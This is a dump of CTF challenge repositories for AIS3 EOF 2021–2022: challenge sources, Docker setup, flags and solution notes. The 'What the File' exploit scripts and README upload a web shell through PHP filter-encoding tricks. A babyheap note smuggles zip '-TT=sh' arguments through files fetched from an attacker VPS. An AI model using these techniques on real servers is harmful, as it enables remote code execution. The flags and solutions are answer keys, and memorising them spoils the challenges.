/ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/hyphen-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/left-brace-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/left-brace-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/radio-checked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/radio-checked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/radio-unchecked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/radio-unchecked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/right-brace-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/right-brace-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-100-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-100-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-25-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-25-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-50-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-50-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-75-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/shade-75-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | module = main 3 | callable = app 4 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tiangolo/uwsgi-nginx-flask:python3.8 2 | RUN pip3 install redis rq 3 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/config.js: -------------------------------------------------------------------------------- 1 | const CONFIG = { 2 | productName: "CTF Note", 3 | version: "v0.0.87", 4 | plugins: { 5 | nyanCat: '/plugins/nyan.js', 6 | xssSimulator: '/plugins/xss.js' 7 | } 8 | }; -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/plugins/nyan.js: -------------------------------------------------------------------------------- 1 | (function () { 2 | const nyanCatURL = "/static/nyancat.gif"; 3 | document.querySelectorAll("p.title:not(.is-4)") 4 | .forEach(title => { 5 | const img = document.createElement("img"); 6 | img.src = nyanCatURL; 7 | img.style.height = '2rem'; 8 | title.appendChild(img); 9 | }); 10 | })(); 11 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/plugins/xss.js: -------------------------------------------------------------------------------- 1 | (function () { 2 | alert("xss!"); 3 | })(); -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/static/nyancat.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/ctf-note/src/static/nyancat.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/static/style.css: -------------------------------------------------------------------------------- 1 | .challenge { 2 | margin-top: 1em; 3 | margin-bottom: 1em; 4 | } 5 | 6 | .notification { 7 | padding: 1em; 8 | text-align: center; 9 | color: #363636; 10 | } 11 | 12 | .notification:hover { 13 | transition: .25s all; 14 | scale: 1.05; 15 | z-index: 1; 16 | box-shadow: 0 0 .5em #ccc; 17 | } -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/src/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | module = main 3 | callable = app -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/xssbot/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN apt update 4 | RUN apt install -y --no-install-recommends chromium chromium-driver redis-server 5 | RUN pip3 install selenium redis rq 6 | 7 | COPY xssbot.py /xssbot.py 8 | COPY run.sh /run.sh 9 | RUN chmod +x /run.sh 10 | RUN useradd --no-create-home --home-dir / --shell /bin/false user 11 | 12 | USER user 13 | CMD /run.sh -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/xssbot/run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | redis-server --protected-mode no & 3 | for _ in {1..4}; do 4 | rq worker & 5 | done 6 | sleep infinity 7 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/ctf-note/xssbot/xssbot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import time 3 | 4 | from selenium.webdriver import Chrome 5 | from selenium.webdriver.chrome.options import Options 6 | from selenium.common.exceptions import TimeoutException, WebDriverException 7 | import os 8 | 9 | TIMEOUT = 7 10 | HOSTNAME = "ctf-note.splitline.tw:9527" 11 | 12 | def browse(url_path): 13 | options = Options() 14 | options.headless = True 15 | options.add_argument('--no-sandbox') # https://stackoverflow.com/a/45846909 16 | options.add_argument('--disable-dev-shm-usage') # https://stackoverflow.com/a/50642913 17 | chrome = Chrome(options=options) 18 | # https://stackoverflow.com/a/47695227 19 | chrome.set_page_load_timeout(TIMEOUT) 20 | chrome.set_script_timeout(TIMEOUT) 21 | 22 | # login 23 | password = os.getenv("PASSWORD") 24 | chrome.get(f"http://{HOSTNAME}/login") 25 | chrome.find_element_by_name('username').send_keys('admin') 26 | chrome.find_element_by_name('password').send_keys(password) 27 | chrome.find_element_by_tag_name('button').click() 28 | 29 | # visit 30 | chrome.get(f"http://{HOSTNAME}/{url_path}") 31 | 32 | time.sleep(TIMEOUT) 33 | chrome.quit() -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/docker-compose.yml: -------------------------------------------------------------------------------- 1 | 2 | version: "3" 3 | 4 | services: 5 | xssbot: 6 | build: ./ctf-note/xssbot 7 | image: splitline/xssbot 8 | container_name: xssbot-ctf-note 9 | environment: 10 | - PASSWORD=lHgpu4EqS4DOJz12Klz0JjQ9CY8nJ3um8yTKl-3YXVg 11 | 12 | ctf-note: 13 | depends_on: 14 | - xssbot 15 | build: ./ctf-note 16 | container_name: ctf-note 17 | volumes: 18 | - ./ctf-note/src/:/app 19 | ports: 20 | - 9527:80/tcp 21 | environment: 22 | - FLAG=FLAG{會不會由於出太難以至於根本沒人看到這個FLAG啊,但你現在好像看到ㄌ,讚} 23 | - PASSWORD=lHgpu4EqS4DOJz12Klz0JjQ9CY8nJ3um8yTKl-3YXVg 24 | 25 | what-the-file: 26 | build: ./what-the-file 27 | container_name: what-the-file 28 | volumes: 29 | - ./what-the-file/flag:/flag_4a55febfacff05bd19fa26ae3d74f796:ro 30 | ports: 31 | - 9487:80/tcp 32 | 33 | CYBERPUNK1977: 34 | image: tiangolo/uwsgi-nginx-flask:python3.8 35 | container_name: CYBERPUNK1977 36 | volumes: 37 | - ./CYBERPUNK1977/app/:/app 38 | ports: 39 | - 1977:80/tcp 40 | environment: 41 | - FLAG=FLAG{RE𝖠𝗟_FⅬ𝗔G} 42 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.4-apache 2 | 3 | COPY src/ /var/www/html/ 4 | 5 | RUN chmod -R 755 /var/www/html 6 | RUN chown root:root /var/www/html 7 | 8 | RUN chown www-data:www-data /var/www/html/sandbox/ 9 | RUN chmod +w /var/www/html/sandbox/ 10 | RUN touch /var/www/html/sandbox/.htaccess -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/README.md: -------------------------------------------------------------------------------- 1 | # What the File 2 | 3 | - Category: Web 4 | - Solves: 15 / 95 (scores >= 1), 55 (scores > 1) 5 | 6 | ## Solution 7 | 8 | 1. Control `file` command's output. (e.g. use Shebang `#! meow`) 9 | 2. Solution 1: Use `convert.base64-decode` 10 | 1. 利用 php 中 base64 會忽略非 base64 字元的特性。 11 | 2. 寫入 base64 encode 過的 webshell 到 Shebang(並控制 offset 使其能正常 decode) 12 | 3. 用 `php://filter/write=convert.base64-decode/resource=file` 寫入檔案 13 | 3. Solution 2: Use `convert.iconv` 14 | 1. 利用 utf-7 會把 `<`, `>` 分別轉為 `+ADw`, `+AD4-` 的特性。 15 | 2. 寫入 utf-7 encode 的 webshell 到 Shebang 16 | 3. 用 `php://filter/write=convert.iconv.utf-7.utf-8/resource=file` 寫入檔案 17 | 4. 利用 `shell.php/.` 作為檔名,使 `pathinfo` 抓不到副檔名,但 `file_put_contents` 能正常寫入檔案 18 | 5. Get Shell! -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/exploit/base64-solution.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | BASE_URL='http://eofqual.ais3.org:9487' 4 | WEB_SHELL='' 5 | echo "#! aaa$(base64 <<< $WEB_SHELL)" > exploit 6 | 7 | res=$(curl $BASE_URL \ 8 | -F "file=@exploit" \ 9 | -F 'log=php://filter/write=convert.base64-decode/resource=shell.php/.' -s) 10 | 11 | shell_path=$(echo $res | grep -oE 'sandbox/[0-9a-f]{32}/shell\.php') 12 | echo "[+] Web Shell: $BASE_URL/$shell_path?cmd=id" 13 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/exploit/iconv-solution.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | BASE_URL='http://eofqual.ais3.org:9487' 4 | WEB_SHELL='' 5 | echo "#! $(iconv -t utf-7 -f utf-8 <<< $WEB_SHELL)" > exploit 6 | 7 | res=$(curl $BASE_URL \ 8 | -F "file=@exploit" \ 9 | -F 'log=php://filter/write=convert.iconv.utf-7.utf-8/resource=shell.php/.' -s) 10 | 11 | shell_path=$(echo $res | grep -oE 'sandbox/[0-9a-f]{32}/shell\.php') 12 | echo "[+] Web Shell: $BASE_URL/$shell_path?cmd=id" 13 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/flag: -------------------------------------------------------------------------------- 1 | FLAG{𖥂𖢐𖥑𖣠𖤐𖤐𖤐𖣠𖡨𖥶𖦂} -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/click.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/click.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/counter2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/counter2.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/divider.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/divider.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/flames.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/flames.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/hot.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/hot.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/ie_logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/ie_logo.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/microfab.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/microfab.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/noframes.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/noframes.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/notepad.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/notepad.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/ns_logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/ns_logo.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/rainbow.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/rainbow.gif -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/what-the-file/src/img/stars.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/what-the-file/src/img/stars.gif -------------------------------------------------------------------------------- /ais3-eof/2022-final/web-npy-viewer/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:latest 2 | 3 | RUN mkdir -p /usr/src/app 4 | WORKDIR /usr/src/app 5 | COPY ./app . 6 | 7 | COPY ./flag /fl4444g 8 | 9 | RUN npm install 10 | 11 | # auto kill container after 10 minutes 12 | CMD [ "timeout", "600", "node", "app.js" ] 13 | -------------------------------------------------------------------------------- /ais3-eof/2022-final/web-npy-viewer/app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "body-parser": "1.19.1", 4 | "express": "4.17.2", 5 | "express-fileupload": "1.3.1", 6 | "npyz": "0.4.2", 7 | "nunjucks": "3.2.2" 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /ais3-eof/2022-final/web-npy-viewer/flag: -------------------------------------------------------------------------------- 1 | EOF{unpickling with node.js is still dangerous?!} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9 2 | 3 | RUN apt-get update 4 | RUN apt-get install xinetd -qy 5 | RUN apt-get install wget zip cowsay -qy 6 | 7 | RUN mv /usr/games/cowsay /usr/local/bin/cowsay 8 | 9 | RUN useradd -m babyheap 10 | COPY ./share /home/babyheap 11 | COPY ./xinetd /etc/xinetd.d/babyheap 12 | RUN chown -R root:root /home/babyheap 13 | RUN chmod -R 755 /home/babyheap 14 | 15 | RUN mkdir /tmp/sandbox/ && chmod 333 /tmp/sandbox/ 16 | 17 | RUN python -m pip install xonsh[full] 18 | 19 | COPY ./flag/readflag.c /readflag.c 20 | COPY ./flag/flag /flag 21 | RUN chmod 0400 /flag && chown root:root /flag 22 | RUN chmod 0444 /readflag.c && gcc /readflag.c -o /readflag 23 | RUN chown root:root /readflag && chmod 4555 /readflag 24 | 25 | CMD ["/usr/sbin/xinetd","-dontfork"] 26 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | main: 5 | build: ./ 6 | ports: 7 | - "7122:2222" 8 | expose: 9 | - "7122" 10 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/exploit/exp.txt: -------------------------------------------------------------------------------- 1 | // 我沒辦法在我ㄉ m1 裝 pwntools 所以懶得寫 exploit script 2 | 3 | 0. read source code 4 | ctrl+d 就會噴位置ㄌ 5 | 不然從 /proc/self/environ 讀也行 6 | 7 | 1. import (9487) 8 | http://vps/babyheap-downloads.txt 9 | 10 | babyheap-downloads.txt 內容為: 11 | ``` 12 | http://vps/-T 13 | http://vps/-TT=sh%20%23 14 | ``` 15 | 16 | 2. import 9487 17 | -ibabyheap-downloads.txt 18 | 19 | 3. export 9527 20 | pwned 21 | // `zip export.zip *` --> `zip export.zip files -T -TT=sh\ #` 22 | 23 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/flag/flag: -------------------------------------------------------------------------------- 1 | FLAG{I don't know why but nc+note=babyheap} -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/flag/readflag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char *argv[]) { 4 | seteuid(0); 5 | setegid(0); 6 | setuid(0); 7 | setgid(0); 8 | 9 | if(argc < 5) { 10 | printf("Usage: %s i want the flag\n", argv[0]); 11 | return 1; 12 | } 13 | 14 | if ((strcmp(argv[1], "i") | strcmp(argv[2], "want") | strcmp(argv[3], "the") | strcmp(argv[4], "flag")) != 0) { 15 | puts("You are not worthy"); 16 | return 1; 17 | } 18 | 19 | char flag[256] = { 0 }; 20 | FILE* fp = fopen("/flag", "r"); 21 | if (!fp) { 22 | perror("fopen"); 23 | return 1; 24 | } 25 | if (fread(flag, 1, 256, fp) < 0) { 26 | perror("fread"); 27 | return 1; 28 | } 29 | puts(flag); 30 | fclose(fp); 31 | return 0; 32 | } -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # exec 2>/dev/null 4 | export XONSH_DATA_DIR="/tmp/.xondata" 5 | timeout 180 xonsh /home/babyheap/main.xonsh 6 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/babyheap/xinetd: -------------------------------------------------------------------------------- 1 | service babyheap 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/babyheap/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = babyheap 10 | bind = 0.0.0.0 11 | port = 2222 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | flags = REUSE 16 | } 17 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM docker:dind 2 | 3 | RUN apk add --update --no-cache python3 py-pip nmap-ncat 4 | 5 | RUN pip install epicbox rich 6 | 7 | WORKDIR /ctf 8 | ENTRYPOINT "/ctf/run.sh" 9 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | judge: 5 | privileged: true 6 | volumes: 7 | - ./share:/ctf 8 | build: ./ 9 | ports: 10 | - "1337:48763" 11 | expose: 12 | - "1337" 13 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/share/README.md: -------------------------------------------------------------------------------- 1 | # LeetCall 2 | 3 | No operators, no conditions, no loops this time, function call is all you need! 4 | 5 | ## Rules: 6 | 1. Just like most of the online judges, inputs are provided from the standard input. 7 | 2. All you can use in your code is: (function) name (e.g. `print`), function call (e.g. `str()`), constants (int, float, byte, normal string etc.). 8 | 3. Your code should contain only one expression (i.e. it can be used in `eval`). 9 | 4. You are unable to use `exec`, `eval`, `import` or similar things to cheat. 10 | 5. If there are something you don't understand, the source code is provided -- so just read it. 11 | 6. Conquer all the 3 challenges and capture the FLAG! 12 | 13 | ## Notes: 14 | 1. For programmers: You are not required to read the source code. 15 | 2. For hackers: This is totally not a sandbox escape challenge, but feel free if you really want to hack it. 16 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/share/flag.txt: -------------------------------------------------------------------------------- 1 | FLAG{actually_you_can_also_solve_those_leetcode_challenges_in_this_way:D} 2 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/share/problems.sample.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "id": 1, 4 | "title": "Hello", 5 | "description": 6 | "Write a code that takes a name as an input and print out a greeting with that name.\nThe greeting format should be 'Hello, !'", 7 | "sample_input": ["Alice", "Bob"], 8 | "sample_output": ["Hello, Alice!", "Hello, Bob!"], 9 | "test_cases": [ 10 | ["Alice", "Hello, Alice!"], 11 | ["Alice\nBob", "Hello, Alice!\nHello, Bob!"] 12 | ], 13 | "length_limit": 128 14 | } 15 | ] -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | rm -f /var/run/docker.pid 3 | dockerd & 4 | sleep 3s 5 | docker pull python:3.9-alpine 6 | ncat -vc 'timeout 500 python3 /ctf/main.py' -kl 0.0.0.0 48763 7 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Misc/leetcall/share/sandbox.tpl.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | # Delete all imported modules 4 | for name in list(sys.modules.keys()): 5 | # '_bootlocale' is for open() 6 | # if encoding of `open` is not specified, it will automatically import `_bootlocale` to get the default encoding 7 | if name != '_bootlocale': 8 | del sys.modules[name] 9 | 10 | 11 | def hook(event, args): 12 | """ 13 | Using Python runtime audit hooks to prevent exec / eval normal python codes. 14 | audithook: 15 | - https://www.python.org/dev/peps/pep-0578/ 16 | - https://docs.python.org/3/library/audit_events.html 17 | """ 18 | if event not in ('open', 'builtins.input', 'builtins.input/result'): 19 | raise Exception("Bad event: " + event+"\n"+str(args)) 20 | if event == 'open' and args[0] != 0: 21 | raise Exception("Sandbox only accepts stdin from file 0") 22 | 23 | 24 | sys.addaudithook(hook) 25 | del sys, hook 26 | 27 | # Your code starts here 28 | {code} 29 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.4-apache 2 | 3 | COPY src/ /var/www/html/ 4 | 5 | RUN chmod -R 755 /var/www/html 6 | RUN chown root:root /var/www/html 7 | 8 | RUN chown www-data:www-data /var/www/html/sandbox/ 9 | RUN chmod +w /var/www/html/sandbox/ 10 | RUN touch /var/www/html/sandbox/.htaccess 11 | RUN touch /var/www/html/sandbox/index.php 12 | 13 | RUN echo 'FLAG{Pecchipee://filter/k!ng}' > /za_f14g.txt -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.5' 2 | 3 | services: 4 | web: 5 | build: . 6 | ports: 7 | - 8002:80/tcp -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/click.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/click.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/counter2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/counter2.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/divider.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/divider.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/flames.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/flames.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/hot.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/hot.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/ie_logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/ie_logo.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/microfab.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/microfab.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/noframes.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/noframes.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/notepad.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/notepad.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/ns_logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/ns_logo.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/rainbow.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/rainbow.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/img/stars.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/img/stars.gif -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/index.php: -------------------------------------------------------------------------------- 1 | 11 | 255 && die('toooooooo loooooong'); ( 12 | trim($ext=pathinfo($out)['extension' 13 | ]) !== '' && strtolower(substr($ext, 14 | 0, 2)) !== "ph")?file_put_contents ( 15 | $out,sprintf(file_get_contents('/va' 16 | .'r/www/html/template.html'), $time, 17 | highlight_string($_GET['code'],true) 18 | )) : die("BAD"); echo "

Highlight: 19 | $out

" 20 | // You might also need: /phpinfo.php 21 | ?> 22 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/phpinfo.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/babyphp/src/sandbox/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2022-quals/Web/babyphp/src/sandbox/.gitkeep -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tiangolo/uwsgi-nginx-flask:python3.9 2 | RUN pip3 install redis rq requests 3 | RUN pip3 install --upgrade flask Werkzeug uwsgi 4 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | GistMD 9 | 10 | 11 | 12 | 13 | {% block main %}{% endblock %} 14 |
15 |
16 |

© 2022 GistMD

17 |
18 | 19 | 20 | -------------------------------------------------------------------------------- /ais3-eof/2022-quals/Web/gistmd/app/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block main %} 3 |
4 |

GistMD

5 | 10 |
11 |
12 |
13 |

Note List

14 |
    15 | {% for note in notes %} 16 |
  1. 17 | {{ note.title }} / {{ note.note_id }} 18 |
  2. 19 | {% else %} 20 |

    (No notes found)

    21 | {% endfor %} 22 |
23 |
